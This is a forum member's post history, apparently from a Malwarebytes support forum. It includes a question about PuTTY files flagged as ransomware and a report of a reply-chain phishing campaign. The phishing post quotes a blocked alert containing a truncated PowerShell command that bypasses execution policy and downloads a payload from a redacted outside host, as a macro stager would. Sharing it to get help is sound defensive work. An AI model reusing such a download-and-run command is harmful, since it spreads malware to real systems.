Jump to content

SCL

Members
  • Content Count

    6
  • Joined

  • Last visited

About SCL

  • Rank
    New Member
  1. SCL

    potential false positive

    OK thanks for confirming guys. Where are the scan logs saved?
  2. SCL

    potential false positive

    After further investigation, I see it was not Active Protection but it was a Quick Scan.
  3. MBAM Active Protection has identified putty related files as locky on several machines on my network. The files have been quarantined and I am hestitent to unquarantine. File names are C:\Program Files\Putty\plink.exe, C:\Windows\Installer\66785c8.msi and C:\Users\*USERNAME*\downloads\putty-64bit-0.68-installer.msi. Is there a log somewhere that I can attach? Or what else needs to be done. Need to verify that this was indeed a false positive.
  4. Thanks Pedro. I have to say- no amount of user training is going to beat this. It was shockingly good. Going to have to continue improving protections. If this becomes the norm, its a whole new ball game. Absolutely none of the typical signs of it being false.
  5. We have gotten AE alerts before. Usually harmless. However this morning multiple malicious emails came into the organization, all from same sending, and 2 users opened the attachment (word doc). I received alert below: 8/31/2017 7:00:09 AM Computer18 10.10.1.125 Exploit payload process blocked BLOCK C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http:\*******************.com\okas\kunkd.dat', $env:APPDATA + '\pP... Computer name and url changed. It looks like the word doc likely had a macro that triggered this but here is the weird thing (and maybe it isn't weird and I just haven't seen it yet). The users here who received emails all received a different email (with bad file attached) that was a reply to previous email conversations. I've not seen that before. The body of each email was the same but was phrased in a way that fooled multiple users, due to language that is pretty spot on for our industry. Can anyone tell me what this is that was blocked, and if the particular of the email being a reply to a previous email is new? Malwarebytes Anti-Exploit.zip
×

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.